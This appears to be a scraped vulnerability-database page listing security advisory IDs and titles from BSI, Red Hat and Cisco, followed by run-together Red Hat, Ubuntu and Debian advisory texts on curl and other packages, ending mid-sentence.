mal-2024-8630 Malicious code in @diotoborg/sequi-perspiciatis (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:13Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
wid-sec-w-2024-1974 QEMU: Schwachstelle ermöglicht Denial of Service 2020-06-08T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1973 QEMU, Xen und Citrix Hypervisor: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit den Rechten des Dienstes 2020-08-24T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1972 QEMU: Schwachstelle ermöglicht Denial of Service 2020-12-30T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1971 QEMU: Schwachstelle ermöglicht Offenlegung von Informationen 2021-01-13T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1969 OpenSC: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen 2024-09-02T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1901 Google Chrome: Mehrere Schwachstellen 2024-08-21T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1496 ffmpeg: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-07-01T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1161 Cacti: Schwachstelle ermöglicht Cross-Site Scripting 2024-05-15T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-1017 Red Hat Enterprise Linux (libvirt): Schwachstelle ermöglicht Denial of Service 2024-05-02T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0848 QEMU: Schwachstelle ermöglicht Denial of Service 2024-04-10T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0806 FRRouting Project FRRouting: Schwachstellen ermöglichen Denial of Service 2024-04-07T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0748 libvirt: Schwachstelle ermöglicht Denial of Service 2020-05-05T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0747 libvirt: Schwachstelle ermöglicht Denial of Service 2020-05-21T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0731 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2024-03-27T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0593 libvirt: Schwachstelle ermöglicht Denial of Service 2024-03-11T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0437 QEMU: Schwachstelle ermöglicht Codeausführung 2024-02-20T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0386 Internet Systems Consortium BIND: Mehrere Schwachstellen ermöglichen Denial of Service 2024-02-13T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2024-0079 QEMU: Schwachstelle ermöglicht Denial of Service 2024-01-14T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-3069 Apache Struts: Schwachstelle ermöglicht Codeausführung 2023-12-06T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2832 FRRouting Project FRRouting: Schwachstelle ermöglicht nicht spezifizierten Angriff 2023-11-05T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2822 FRRouting Project FRRouting: Mehrere Schwachstellen 2023-11-05T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2799 QEMU: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2023-10-31T23:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2748 FRRouting: Mehrere Schwachstellen ermöglichen Denial of Service 2023-10-25T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2346 Apache Struts: Schwachstelle ermöglicht Denial of Service 2023-09-13T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2302 QEMU: Schwachstelle ermöglicht Denial of Service 2023-09-10T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2072 Prozessoren verschiedener Hersteller: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen 2018-05-21T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-2059 QEMU: Schwachstelle ermöglicht Denial of Service 2023-08-14T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-1965 QEMU: Schwachstelle ermöglicht Denial of Service 2023-08-03T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-1963 QEMU: Schwachstelle ermöglicht Denial of Service 2023-08-03T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
wid-sec-w-2023-1960 QEMU: Schwachstelle ermöglicht Offenlegung von Informationen 2023-08-03T22:00:00.000+00:00 2024-09-02T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
rhsa-2025_0390 Red Hat Security Advisory: Red Hat OpenShift distributed tracing platform (Tempo) 3.4 release 2025-01-16T17:44:29+00:00 2025-03-25T11:09:17+00:00
rhsa-2025_0364 Red Hat Security Advisory: OpenShift Container Platform 4.14.45 bug fix and security update 2025-01-22T03:22:29+00:00 2025-03-25T11:09:14+00:00
rhsa-2025_0679 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.10.7 bug fixes and container updates 2025-01-23T23:30:43+00:00 2025-03-25T11:09:13+00:00
rhsa-2025_0560 Red Hat Security Advisory: Red Hat Multicluster GlobalHub 1.2.1 bug fixes and container updates 2025-01-21T21:22:09+00:00 2025-03-25T11:09:12+00:00
rhsa-2025_0384 Red Hat Security Advisory: RHSA: Submariner 0.18.4 - bug and security fixes 2025-01-16T18:46:52+00:00 2025-03-25T11:09:12+00:00
rhsa-2025_0121 Red Hat Security Advisory: OpenShift Container Platform 4.15.43 bug fix and security update 2025-01-15T02:21:47+00:00 2025-03-25T11:09:08+00:00
rhsa-2025_0678 Red Hat Security Advisory: RHSA: Submariner 0.16.8 - bug and security fixes 2025-01-23T20:25:51+00:00 2025-03-25T11:09:07+00:00
rhsa-2025_0552 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.4.7 security updates and bug fixes 2025-01-21T23:12:13+00:00 2025-03-25T11:09:07+00:00
rhsa-2025_0386 Red Hat Security Advisory: VolSync 0.10.2 for RHEL 9 2025-01-16T18:36:58+00:00 2025-03-25T11:09:06+00:00
rhsa-2025_0140 Red Hat Security Advisory: OpenShift Container Platform 4.16.30 bug fix and security update 2025-01-15T00:51:07+00:00 2025-03-25T11:09:02+00:00
rhsa-2025_0385 Red Hat Security Advisory: VolSync 0.11.1 for RHEL 9 2025-01-16T18:08:53+00:00 2025-03-25T11:09:01+00:00
rhsa-2025_0115 Red Hat Security Advisory: OpenShift Container Platform 4.17.12 bug fix and security update 2025-01-14T09:52:44+00:00 2025-03-25T11:08:56+00:00
rhsa-2025_0224 Red Hat Security Advisory: Red Hat build of Cryostat security update 2025-01-09T17:48:40+00:00 2025-03-25T11:08:51+00:00
rhsa-2025_0048 Red Hat Security Advisory: OpenShift Virtualization 4.17.3 Images 2025-01-07T21:44:39+00:00 2025-03-25T11:08:45+00:00
rhsa-2025_1704 Red Hat Security Advisory: OpenShift Container Platform 4.16.36 security and extras update 2025-02-27T00:33:09+00:00 2025-03-25T11:07:59+00:00
rhsa-2025_1888 Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.15.1 security update 2025-02-26T19:14:08+00:00 2025-03-25T11:07:54+00:00
rhsa-2025_1869 Red Hat Security Advisory: Red Hat OpenStack Platform 16.2 (osp-director-operator) security update 2025-02-26T13:39:37+00:00 2025-03-25T11:07:50+00:00
rhsa-2025_1870 Red Hat Security Advisory: Red Hat OpenStack Platform 17.1 (osp-director-operator) security update 2025-02-26T13:47:46+00:00 2025-03-25T11:07:44+00:00
rhsa-2025_0662 Red Hat Security Advisory: grafana security update 2025-01-23T09:34:23+00:00 2025-03-25T11:07:33+00:00
rhsa-2025_0401 Red Hat Security Advisory: grafana security update 2025-01-20T01:40:19+00:00 2025-03-25T11:07:27+00:00
rhsa-2021_1852 Red Hat Security Advisory: ghostscript security, bug fix, and enhancement update 2021-05-18T14:44:46+00:00 2025-03-24T21:23:42+00:00
rhsa-2023_7222 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.2 security and bug fix update 2023-11-15T01:25:46+00:00 2025-03-24T12:06:25+00:00
rhsa-2023_7096 Red Hat Security Advisory: python-cryptography security update 2023-11-14T16:14:38+00:00 2025-03-24T12:05:59+00:00
rhsa-2023_6793 Red Hat Security Advisory: rh-python38-python security update 2023-11-08T08:20:36+00:00 2025-03-24T12:05:53+00:00
rhsa-2023_6316 Red Hat Security Advisory: pcs security, bug fix, and enhancement update 2023-11-07T08:32:01+00:00 2025-03-24T12:05:47+00:00
rhsa-2023_6615 Red Hat Security Advisory: python-cryptography security update 2023-11-07T08:47:31+00:00 2025-03-24T12:05:39+00:00
rhsa-2023_3815 Red Hat Security Advisory: Service Registry (container images) release and security update [2.4.3 GA] 2023-06-27T11:28:55+00:00 2025-03-24T12:03:33+00:00
rhsa-2023_5484 Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.4.13 security update on RHEL 7 2023-10-05T20:23:52+00:00 2025-03-24T12:03:23+00:00
rhsa-2023_3742 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update 2023-06-21T15:22:11+00:00 2025-03-24T12:03:22+00:00
rhsa-2023_5447 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.0 security and bug fix update 2023-10-05T01:03:01+00:00 2025-03-24T12:03:15+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
cisco-sa-appnav-xe-dos-j5mxtr4 Cisco IOS XE Software AppNav-XE Denial of Service Vulnerability 2022-04-13T16:00:00+00:00 2022-04-13T16:00:00+00:00
cisco-sa-ap-ip-flood-dos-6hxxenvq Cisco Embedded Wireless Controller with Catalyst Access Points IP Flood Denial of Service Vulnerability 2022-04-13T16:00:00+00:00 2022-04-13T16:00:00+00:00
cisco-sa-wsa-stored-xss-xpsjghmy Cisco Web Security Appliance Stored Cross-Site Scripting Vulnerability 2022-04-06T16:00:00+00:00 2022-04-06T16:00:00+00:00
cisco-sa-webex-java-mvx6crh9 Cisco Webex Meetings Java Deserialization Vulnerability 2022-04-06T16:00:00+00:00 2022-04-06T16:00:00+00:00
cisco-sa-swa-filter-bypass-xxxtu3x Cisco Web Security Appliance Filter Bypass Vulnerability 2022-04-06T16:00:00+00:00 2022-04-06T16:00:00+00:00
cisco-sa-sna-xss-mca9tqnj Cisco Secure Network Analytics Network Diagrams Application Cross-Site Scripting Vulnerability 2022-04-06T16:00:00+00:00 2022-04-06T16:00:00+00:00
cisco-sa-info-exp-yxawyp3s Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability 2022-04-06T16:00:00+00:00 2022-04-06T16:00:00+00:00
cisco-sa-esa-snmp-jlajkswk Multiple Cisco Security Products Simple Network Management Protocol Service Denial of Service Vulnerability 2022-04-06T16:00:00+00:00 2022-04-06T16:00:00+00:00
cisco-sa-nxos-bfd-dos-wgqxrzxn Cisco Nexus 9000 Series Switches Bidirectional Forwarding Detection Denial of Service Vulnerability 2022-02-23T16:00:00+00:00 2022-03-23T15:41:48+00:00
cisco-sa-capic-mdvul-hbsjbuvw Cisco Application Policy Infrastructure Controller Command Injection and File Upload Vulnerabilities 2021-08-25T16:00:00+00:00 2022-03-08T16:52:49+00:00
cisco-sa-capic-frw-nt3ryxr2 Cisco Application Policy Infrastructure Controller Arbitrary File Read and Write Vulnerability 2021-08-25T16:00:00+00:00 2022-03-08T16:52:47+00:00
cisco-sa-ise-dos-jlh9txbp Cisco Identity Services Engine RADIUS Service Denial of Service Vulnerability 2022-03-02T16:00:00+00:00 2022-03-03T18:35:40+00:00
cisco-sa-uccsmi-prvesc-bqhge4cm Cisco Ultra Cloud Core - Subscriber Microservices Infrastructure Privilege Escalation Vulnerability 2022-03-02T16:00:00+00:00 2022-03-02T16:00:00+00:00
cisco-sa-staros-cmdinj-759mnt4n Cisco StarOS Command Injection Vulnerability 2022-03-02T16:00:00+00:00 2022-03-02T16:00:00+00:00
cisco-sa-expressway-filewrite-87q5yrk Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities 2022-03-02T16:00:00+00:00 2022-03-02T16:00:00+00:00
cisco-sa-cdp-dos-g8dplwyg Cisco FXOS and NX-OS Software Cisco Discovery Protocol Service Denial of Service Vulnerability 2022-02-23T16:00:00+00:00 2022-03-01T17:35:44+00:00
cisco-sa-esa-dos-mxzvgtgu Cisco Email Security Appliance DNS Verification Denial of Service Vulnerability 2022-02-16T16:00:00+00:00 2022-02-25T19:22:29+00:00
cisco-sa-nxos-nxapi-cmdinject-uluknmz2 Cisco NX-OS Software NX-API Command Injection Vulnerability 2022-02-23T16:00:00+00:00 2022-02-23T16:00:00+00:00
cisco-sa-cfsoip-dos-tpykydr Cisco NX-OS Software Cisco Fabric Services Over IP Denial of Service Vulnerability 2022-02-23T16:00:00+00:00 2022-02-23T16:00:00+00:00
cisco-sa-n9kaci-tcp-dos-yxukt6gm Cisco Nexus 9000 Series Fabric Switches ACI Mode Multi-Pod and Multi-Site TCP Denial of Service Vulnerability 2021-08-25T16:00:00+00:00 2022-02-23T15:56:25+00:00
cisco-sa-iosxr-scp-inject-qwzocv2 Cisco IOS XR Software Arbitrary File Read and Write Vulnerability 2021-09-08T16:00:00+00:00 2022-02-18T14:38:20+00:00
cisco-sa-sd-wan-rhpbe34a Cisco IOS XE SD-WAN Software Command Injection Vulnerability 2021-10-20T16:00:00+00:00 2022-02-17T18:13:49+00:00
cisco-sa-rcm-tcp-dos-2wh8xjaq Cisco Redundancy Configuration Manager for Cisco StarOS Software TCP Denial of Service Vulnerability 2022-02-16T16:00:00+00:00 2022-02-16T16:00:00+00:00
cisco-sa-pi-epnm-xss-p8fbz2fw Cisco Prime Infrastructure and Evolved Programmable Network Manager Cross-Site Scripting Vulnerability 2022-02-16T16:00:00+00:00 2022-02-16T16:00:00+00:00
cisco-sa-smb-mult-vuln-ka9pk6d Cisco Small Business RV Series Routers Vulnerabilities 2022-02-02T16:00:00+00:00 2022-02-14T13:54:42+00:00
cisco-sa-dnac-info-disc-8qeynkej Cisco DNA Center Information Disclosure Vulnerability 2022-02-02T16:00:00+00:00 2022-02-04T20:22:37+00:00
cisco-sa-sma-wsa-esa-info-dis-vsvpzohp Cisco Content Security Management Appliance and Cisco Web Security Appliance Information Disclosure Vulnerability 2020-09-02T16:00:00+00:00 2022-02-02T21:31:49+00:00
cisco-sa-swg-fbyps-3z4qt7p Cisco Umbrella Secure Web Gateway File Inspection Bypass Vulnerability 2022-02-02T16:00:00+00:00 2022-02-02T16:00:00+00:00
cisco-sa-cpsc-info-disc-zkjbdj9f Cisco Prime Service Catalog Information Disclosure Vulnerability 2022-02-02T16:00:00+00:00 2022-02-02T16:00:00+00:00
cisco-sa-apache-log4j-qruknebd Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021 2021-12-10T18:45:00+00:00 2022-01-31T21:16:10+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202104-0334 curl 7.1.1 to and including 7.75.0 is vulnerable to an "Exposure of Private Personal Information to an Unauthorized Actor" by leaking credentials in the HTTP Referer: header. libcurl does not strip off user credentials from the URL when automatically populating the Referer: HTTP request header field in outgoing HTTP requests, and therefore risks leaking sensitive data to the server that is the target of the second HTTP request. curl Contains an information disclosure vulnerability.Information may be obtained. This could lead to exposure of the credentials to the server to which requests were redirected. (CVE-2021-22876) A vulnerability was found in curl where a flaw in the option parser for sending NEW_ENV variables libcurl can pass uninitialized data from a stack-based buffer to the server. The highest threat from this vulnerability is to confidentiality. (CVE-2021-22898). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes Advisory ID: RHSA-2022:1081-01 Product: Red Hat ACM Advisory URL: https://access.redhat.com/errata/RHSA-2022:1081 Issue date: 2022-03-28 CVE Names: CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2021-3200 CVE-2021-3445 CVE-2021-3521 CVE-2021-3580 CVE-2021-3712 CVE-2021-3800 CVE-2021-3999 CVE-2021-20231 CVE-2021-20232 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23177 CVE-2021-28153 CVE-2021-31566 CVE-2021-33560 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-42574 CVE-2021-43565 CVE-2022-23218 CVE-2022-23219 CVE-2022-23308 CVE-2022-23806 CVE-2022-24407 ==================================================================== 1. Summary: Gatekeeper Operator v0.2 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Description: Gatekeeper Operator v0.2 Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters. This advisory contains the container images for Gatekeeper that include security updates, and container upgrades. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Note: Gatekeeper support from the Red Hat support team is limited cases where it is integrated and used with Red Hat Advanced Cluster Management for Kubernetes. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/. Security updates: * golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565) * golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806) 3. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation: - - Upgrade gatekeeper operator: The gatekeeper operator that is installed by the gatekeeper operator policy has `installPlanApproval` set to `Automatic`. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting for `installPlanApproval` to `manual`, then you must view each cluster to manually approve the upgrade to the operator. - - Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'. Refer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/ for additional information. 4. Bugs fixed (https://bugzilla.redhat.com/): 2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 5. References: https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3521 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3712 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3999 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23177 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-31566 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-42574 https://access.redhat.com/security/cve/CVE-2021-43565 https://access.redhat.com/security/cve/CVE-2022-23218 https://access.redhat.com/security/cve/CVE-2022-23219 https://access.redhat.com/security/cve/CVE-2022-23308 https://access.redhat.com/security/cve/CVE-2022-23806 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/updates/classification/#moderate https://open-policy-agent.github.io/gatekeeper/website/docs/howto/ 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBYkHUf9zjgjWX9erEAQiizw//XXMOXR1Xe/Fp6uV2DCknXEAWJbYuGV43 9a87QSq5ob3vbqGGXQXLU6ENjFtAx37/+5+UqAVbzcj+LQ0lV6Ny9rVzolDT4ltG k7J/BUd/kyr9G5gbiih3D/tm8dLh/rLft8FKgB+hEw+NcXnFlEvW5iEymqAsyH/D mrcgCrASFoWG4S4/JC+g8r1TRHAJj4ERAy4ZpDqn/eoOWY3jD+rPv1VD5Z+XaE07 +jw+mvZukP2l0374Yn3W+g7uVOZ5RSqSpEzBZoSy3ffYAqpK+oQ7eN19DOW7l3tr Ko/4h4OmLcOtIRedyt86xJe+zY7Ovo1cRP1TUgRapZGpTCPjaQ/okOhAIh03uxrx ceCawNnagBB1iglJl29GNRUUUU0JWhbEPDLepSjfsyOwkJxvtUulC/W+RJVfpE7Q LimNdHDJbFWN1x4IujdJNOCjPnBj6sG84PxLIjx5hM07ARRCBfrHutmlBm6Aq8Ej mcNPudtyufYuAqcNx8Pe04kwRmzeukNm/qVvr+ywG1+Rp4yo3mkxplZY+5z7S2sH vsciDeEGg6CAh7Sm/zfN3fpvNei1WhzcSxKsHMLB40ASJU2sMe1tt9b2pPhaHfXK lYnIN38GSqlQUjvb1jy8ymzOT3+73uCjYQrVbsGXoevb1639pasWv5i9dyx27kPb 1PnhEG7/jO4=XPu4 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary: An update is now available for OpenShift Logging 5.3. Solution: For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update: https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update: https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html 4. Bugs fixed (https://bugzilla.redhat.com/): 1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value 5. JIRA issues fixed (https://issues.jboss.org/): LOG-1897 - Applying cluster state is causing elasticsearch to hit an issue and become unusable LOG-1925 - [release-5.3] No datapoint for CPU on openshift-logging dashboard LOG-1962 - [release-5.3] CLO panic: runtime error: slice bounds out of range [:-1] 6. ========================================================================== Ubuntu Security Notice USN-4898-1 March 31, 2021 curl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 20.10 - Ubuntu 20.04 LTS - Ubuntu 18.04 LTS - Ubuntu 16.04 LTS Summary: curl could be made to expose sensitive information over the network. A remote attacker could possibly use this issue to obtain sensitive information. A remote attacker in control of an HTTPS proxy could use this issue to bypass certificate checks and intercept communications. This issue only affected Ubuntu 20.04 LTS and Ubuntu 20.10. (CVE-2021-22890) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 20.10: curl 7.68.0-1ubuntu4.3 libcurl3-gnutls 7.68.0-1ubuntu4.3 libcurl3-nss 7.68.0-1ubuntu4.3 libcurl4 7.68.0-1ubuntu4.3 Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.5 libcurl3-gnutls 7.68.0-1ubuntu2.5 libcurl3-nss 7.68.0-1ubuntu2.5 libcurl4 7.68.0-1ubuntu2.5 Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.13 libcurl3-gnutls 7.58.0-2ubuntu3.13 libcurl3-nss 7.58.0-2ubuntu3.13 libcurl4 7.58.0-2ubuntu3.13 Ubuntu 16.04 LTS: curl 7.47.0-1ubuntu2.19 libcurl3 7.47.0-1ubuntu2.19 libcurl3-gnutls 7.47.0-1ubuntu2.19 libcurl3-nss 7.47.0-1ubuntu2.19 In general, a standard system update will make all the necessary changes. Summary: Red Hat OpenShift Virtualization release 4.8.3 is now available with updates to packages and images that fix several bugs and add enhancements. Description: OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/): 1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1997017 - unprivileged client fails to get guest agent data 1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed 2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount 2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import 2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed 2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion 2007336 - 4.8.3 containers 2007776 - Failed to Migrate Windows VM with CDROM (readonly) 2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13 2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted 2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues 2026881 - [4.8.3] vlan-filtering is getting applied on veth ports 5. Summary: The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description: The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Security Fix(es): * nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2021-3757) * mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) (CVE-2021-3948) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution: For details on how to install and use MTC, refer to: https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html 4. Bugs fixed (https://bugzilla.redhat.com/): 2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-4881-1 security@debian.org https://www.debian.org/security/ Alessandro Ghedini March 30, 2021 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : curl CVE ID : CVE-2020-8169 CVE-2020-8177 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2021-22876 CVE-2021-22890 Debian Bug : 965280 965281 968831 977161 977162 977163 Multiple vulnerabilities were discovered in cURL, an URL transfer library: CVE-2020-8169 Marek Szlagor reported that libcurl could be tricked into prepending a part of the password to the host name before it resolves it, potentially leaking the partial password over the network and to the DNS server(s). CVE-2020-8177 sn reported that curl could be tricked by a malicious server into overwriting a local file when using th -J (--remote-header-name) and -i (--include) options in the same command line. CVE-2020-8231 Marc Aldorasi reported that libcurl might use the wrong connection when an application using libcurl's multi API sets the option CURLOPT_CONNECT_ONLY, which could lead to information leaks. CVE-2020-8284 Varnavas Papaioannou reported that a malicious server could use the PASV response to trick curl into connecting back to an arbitrary IP address and port, potentially making curl extract information about services that are otherwise private and not disclosed. CVE-2020-8285 xnynx reported that libcurl could run out of stack space when using tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION). CVE-2020-8286 It was reported that libcurl didn't verify that an OCSP response actually matches the certificate it is intended to. CVE-2021-22890 Mingtao Yang reported that, when using an HTTPS 